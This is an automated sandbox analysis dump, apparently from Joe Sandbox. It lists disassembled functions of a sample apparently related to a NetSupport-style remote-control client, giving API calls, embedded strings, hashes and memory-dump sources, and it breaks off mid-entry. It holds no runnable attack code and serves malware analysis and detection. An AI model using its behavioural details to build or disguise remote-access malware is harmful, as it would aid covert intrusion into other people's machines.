                                                                                                                        • Instruction ID: 4a1eb799ad59bd8ad95e11a6dd9148f36df4bfd9c98d20615ada746361e6057e
                                                                                                                        • Opcode Fuzzy Hash: 1f641455995811170a1f2cb8d695839c1a79b3bf4dd927f35b34ded445de237d
                                                                                                                        • Instruction Fuzzy Hash: 6A213D31A44604EBDB20DBA9EC44FAA7BEEDB94B05F540095E904E3290EFB4D940DBA0
                                                                                                                        Function 00AEED80 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 38libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(USER32,?,?,00AFEA6F), ref: 00AEED89
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00AEED9D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00AEEDAA
                                                                                                                        • GetProcAddress.KERNEL32(?,EnumDisplayDevicesW), ref: 00AEEDB7
                                                                                                                        • GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 00AEEDC4
                                                                                                                        • _memset.LIBCMT ref: 00AEEDD4
                                                                                                                          • Part of subcall function 00AEE820: _memset.LIBCMT ref: 00AEE843
                                                                                                                          • Part of subcall function 00AEE820: _memset.LIBCMT ref: 00AEE875
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$_memset$LibraryLoad
                                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoW$MonitorFromRect$USER32
                                                                                                                        • API String ID: 1187747625-2044714463
                                                                                                                        • Opcode ID: 830ca3ca2169687e1318f3826a4d8eb830209283ef4f8c583774ff8e6f84a449
                                                                                                                        • Instruction ID: 9839f97a9f868b138b8c39b769da7e04a005e6885dba642db73683a554f622e5
                                                                                                                        • Opcode Fuzzy Hash: 830ca3ca2169687e1318f3826a4d8eb830209283ef4f8c583774ff8e6f84a449
                                                                                                                        • Instruction Fuzzy Hash: F6F01271A407046BC720AF7A9D45E47F7E8EF94B10B11486EF189E32A0DABCA4408F95
                                                                                                                        Function 00B0F400 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 221COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,5E06C67B), ref: 00B0F466
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 00B0F4A7
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,00000000,00000000,00000000,?), ref: 00B0F4E7
                                                                                                                        • GetLastError.KERNEL32 ref: 00B0F625
                                                                                                                        • __wcsdup.LIBCMT ref: 00B0F6F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderPath$ErrorFileLastModuleName__wcsdup
                                                                                                                        • String ID: %s not created, e=%d$Access to %s = %d$Created folder (or exists) %s$IsA()$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 3726295009-2115974479
                                                                                                                        • Opcode ID: f213491872c8690049a229ae859534883b34683bd6530f179aa42863ce29f4f0
                                                                                                                        • Instruction ID: 5a105259ab70c4029aa72eda49499c58d2ff343f4245b7592227ac272f1469d9
                                                                                                                        • Opcode Fuzzy Hash: f213491872c8690049a229ae859534883b34683bd6530f179aa42863ce29f4f0
                                                                                                                        • Instruction Fuzzy Hash: 3781D0B1A0021A9ACB30DF54CC51BFAB7F5EF94314F1442E8E809A36D1EB71AA54CF91
                                                                                                                        Function 00AFE7C0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFE7F3
                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AFE829
                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00AFE859
                                                                                                                        • VerQueryValueW.VERSION(00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 00AFE87A
                                                                                                                        • VerQueryValueW.VERSION(00000000,\StringFileInfo\080904b0\ProductVersion,?,?,00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 00AFE897
                                                                                                                        • VerQueryValueW.VERSION(00000000,\StringFileInfo\040904b0\ProductVersion,?,?,00000000,\StringFileInfo\080904b0\ProductVersion,?,?,00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 00AFE8B4
                                                                                                                          • Part of subcall function 00B3B767: __isdigit_l.LIBCMT ref: 00B3B78C
                                                                                                                        Strings
                                                                                                                        • \StringFileInfo\080904b0\ProductVersion, xrefs: 00AFE891
                                                                                                                        • \gdihook5.dll, xrefs: 00AFE814
                                                                                                                        • \StringFileInfo\040904b0\ProductVersion, xrefs: 00AFE8AE
                                                                                                                        • \StringFileInfo\040904e4\ProductVersion, xrefs: 00AFE874
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$FileInfoVersion$DirectorySizeSystem__isdigit_l
                                                                                                                        • String ID: \StringFileInfo\040904b0\ProductVersion$\StringFileInfo\040904e4\ProductVersion$\StringFileInfo\080904b0\ProductVersion$\gdihook5.dll
                                                                                                                        • API String ID: 3509900508-296312680
                                                                                                                        • Opcode ID: 8c26e1196c5395fa9bb3862602f196ea440f0bf80e4a8f9d0065b9f842ddb8e6
                                                                                                                        • Instruction ID: 1479aa9f7706510d086f3b38df602d245ef71cd30b3b202b14791ad5aaa8a98a
                                                                                                                        • Opcode Fuzzy Hash: 8c26e1196c5395fa9bb3862602f196ea440f0bf80e4a8f9d0065b9f842ddb8e6
                                                                                                                        • Instruction Fuzzy Hash: CB51D9B1D0022996DB30EBA48D85BBBB2F8AF54344F1445E9FD49A3251F774DE80C7A2
                                                                                                                        Function 00B24DBE Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memmove.LIBCMT ref: 00B24E54
                                                                                                                        • _memmove.LIBCMT ref: 00B24EAB
                                                                                                                        • wsprintfW.USER32 ref: 00B24EC2
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00B24F50
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegEnumValueW.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 00B24FFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Value_memmove$EnumLocalTime_mallocwvsprintf
                                                                                                                        • String ID: "$%s exists$%s=%s, err=%d$Found %s$\%s
                                                                                                                        • API String ID: 1908247923-3597523911
                                                                                                                        • Opcode ID: ecfae86d24f24dd669a6e065eedb8261c8164dca35a9469531b879c1a212a524
                                                                                                                        • Instruction ID: f974a0df77ce59953aa22e4665669ec447b3a92aa9d20bbbdb6d9ca6549ba0f9
                                                                                                                        • Opcode Fuzzy Hash: ecfae86d24f24dd669a6e065eedb8261c8164dca35a9469531b879c1a212a524
                                                                                                                        • Instruction Fuzzy Hash: 39519E769001299ADF24DB94DC85EEE73B8EF94300F1085D9F90DA7151EFB09E488FA1
                                                                                                                        Function 00B30F65 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 138fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B30F96
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B31037
                                                                                                                        • GetLastError.KERNEL32 ref: 00B3104B
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B310DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Copy$ErrorLastModuleName
                                                                                                                        • String ID: .new$Copy %s to %s$Copy failed - pcigina in use$pcigina
                                                                                                                        • API String ID: 2850203897-1136079111
                                                                                                                        • Opcode ID: e84565485fc8e68ff249a8f1dbb5671389f4946ce16c8002d9d0a686c339c3b4
                                                                                                                        • Instruction ID: 1814308fc7eac1d75e81875d527cbe150d9d9c83580c8525c56f958d57869fa8
                                                                                                                        • Opcode Fuzzy Hash: e84565485fc8e68ff249a8f1dbb5671389f4946ce16c8002d9d0a686c339c3b4
                                                                                                                        • Instruction Fuzzy Hash: 3041D6B694021997CB30AB58CD56BEB33F8EF94700F1045E8FB0A972C1EA755E45CB91
                                                                                                                        Function 00AE4060 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 130registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00AE4113
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00AE4145
                                                                                                                        • __fassign.LIBCMT ref: 00AE418C
                                                                                                                          • Part of subcall function 00B3945D: wcstoxl.LIBCMT ref: 00B3946D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AE41A3
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE41B5
                                                                                                                          • Part of subcall function 00B137C0: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?), ref: 00B137E0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumOpenQueryValue__fassign__wcsicollwcstoxl
                                                                                                                        • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp$CurrConfig$General\ProductID$nssCurrConfig
                                                                                                                        • API String ID: 852375482-3838709216
                                                                                                                        • Opcode ID: 84f8853947cfc0e23072a64b018e48eb5d1c73b7d164443e3ad9cf7d671f8ee8
                                                                                                                        • Instruction ID: 00b134b9da9bc6edd796990cef183693a7e6d456a6eb2dfb7b9864fee9eaf2bb
                                                                                                                        • Opcode Fuzzy Hash: 84f8853947cfc0e23072a64b018e48eb5d1c73b7d164443e3ad9cf7d671f8ee8
                                                                                                                        • Instruction Fuzzy Hash: 0C415672A00318AFDB20DB65DC41F9A77FCAB99700F1045D9F64DE7241EA70AA448BA1
                                                                                                                        Function 00AEE150 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountMetricsSystemTick$ReleaseVersion__wcsicoll_memset
                                                                                                                        • String ID: PCI GDIHOOK5
                                                                                                                        • API String ID: 66172683-3323809677
                                                                                                                        • Opcode ID: 329a98727f40be3f9710cd93af2d995cce49fd22205f71b9c49f0361689f61ba
                                                                                                                        • Instruction ID: 3417eb1884dc44eaf03f25b37f54993dee2f8a12b18b2823453ab288a6ef1534
                                                                                                                        • Opcode Fuzzy Hash: 329a98727f40be3f9710cd93af2d995cce49fd22205f71b9c49f0361689f61ba
                                                                                                                        • Instruction Fuzzy Hash: 9D41BFB19003589FCF24DF66CC85AEAB7FCEF85304F0044ADE60A97240EA759A45CF62
                                                                                                                        Function 00B11269 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$__wcsicoll__wcsnicmp_fgetws
                                                                                                                        • String ID: .scp$IsA()$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 218992925-1699613979
                                                                                                                        • Opcode ID: e2802b13fe9ca26c562a8609a6deb4088f13174962ef1a6220e0201de4116e1a
                                                                                                                        • Instruction ID: 8b639054ad54c1a000f7098c975e4c00699495ec994bff2344e1b4a8d0c394d4
                                                                                                                        • Opcode Fuzzy Hash: e2802b13fe9ca26c562a8609a6deb4088f13174962ef1a6220e0201de4116e1a
                                                                                                                        • Instruction Fuzzy Hash: 9621E5B5E4030176EB21A620AC53FFB33E89F51701F1404E8FE09E6286FE71F95586A6
                                                                                                                        Function 00B06880 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsicoll
                                                                                                                        • String ID: BMP$GIF$JPEG$JPG$PNG
                                                                                                                        • API String ID: 3832890014-952745279
                                                                                                                        • Opcode ID: 25c71bf73d0109c5e6e7d2debe33fd1a33b4242ecb33297b318b49957927974c
                                                                                                                        • Instruction ID: df0d258f4a10f2aa2be4999d07eafd937c7030d6037aab6c91aceb584315f82c
                                                                                                                        • Opcode Fuzzy Hash: 25c71bf73d0109c5e6e7d2debe33fd1a33b4242ecb33297b318b49957927974c
                                                                                                                        • Instruction Fuzzy Hash: BA014F63F4162532E96035A93D07F9637C88B11796F0800F1FD0CF9681F69ADA2542E2
                                                                                                                        Function 00AE3130 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsicoll_fwprintf$_fseek
                                                                                                                        • String ID: 0x%08x$0x00000000$client32.ini$client32u.ini
                                                                                                                        • API String ID: 3044674554-1708878548
                                                                                                                        • Opcode ID: d5b54e63bf11fc8bc03b021c8bc3d5457f6a34c8c23761249cdc2ef6feaf73cb
                                                                                                                        • Instruction ID: a9d30f48ac0e532752a0cf188049328d9884c04f9d21185be1926fc1a7917902
                                                                                                                        • Opcode Fuzzy Hash: d5b54e63bf11fc8bc03b021c8bc3d5457f6a34c8c23761249cdc2ef6feaf73cb
                                                                                                                        • Instruction Fuzzy Hash: 7F616AB2E00209ABDF10DFA6CC41BAEB7B9AF94310F244159E944B7241E775AE45CBE1
                                                                                                                        Function 00B33370 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,5E06C67B,00000000,?), ref: 00B333B7
                                                                                                                        • CoCreateInstance.OLE32(00B7DD60,00000000,00000017,00B7DC90,?), ref: 00B333D7
                                                                                                                        • wsprintfW.USER32 ref: 00B333F7
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00B33403
                                                                                                                        • wsprintfW.USER32 ref: 00B334B7
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00B33558
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                        • API String ID: 3050498177-823534439
                                                                                                                        • Opcode ID: aa865e8730b02e2e504af0c585caca14b2d077fc4ed71de4baaf342d2b96275b
                                                                                                                        • Instruction ID: 0bdc01588aa09942661cc770031875952977e938a2b1b14afd4989281f599b05
                                                                                                                        • Opcode Fuzzy Hash: aa865e8730b02e2e504af0c585caca14b2d077fc4ed71de4baaf342d2b96275b
                                                                                                                        • Instruction Fuzzy Hash: 6A516271B40218ABCB20DB59CC85FABB7F8EB89B10F1085E9F419D7291DA74AE41CB51
                                                                                                                        Function 00B1ADE0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 00B1AE46
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 00B1AE67
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B1AE7C
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B1AE87
                                                                                                                        • GetDC.USER32(?), ref: 00B1AE92
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B1AE9D
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B1AEA7
                                                                                                                          • Part of subcall function 00B12030: LoadLibraryW.KERNEL32(User32.dll,00000000,00B1AE2C), ref: 00B12038
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$CapsDeviceErrorFreeLastLoadOpenReleaseVersion_memset_wcsncpy
                                                                                                                        • String ID: GetDpiForSystem$GetDpiForWindow
                                                                                                                        • API String ID: 498693238-1626071520
                                                                                                                        • Opcode ID: da99c37f9374a1029ad9dcd93ddf2b7735bee1b143b05c451ea45b76042290ad
                                                                                                                        • Instruction ID: 75a67b2868699b8411211958addeb76f06988165cdb67edbedc24e1be4dd7fe9
                                                                                                                        • Opcode Fuzzy Hash: da99c37f9374a1029ad9dcd93ddf2b7735bee1b143b05c451ea45b76042290ad
                                                                                                                        • Instruction Fuzzy Hash: 8341E633E45214AFD7259B98EC85BEDF7E4E744B21F6046BAEC09D3780DB3968408791
                                                                                                                        Function 00AE2350 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 143COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
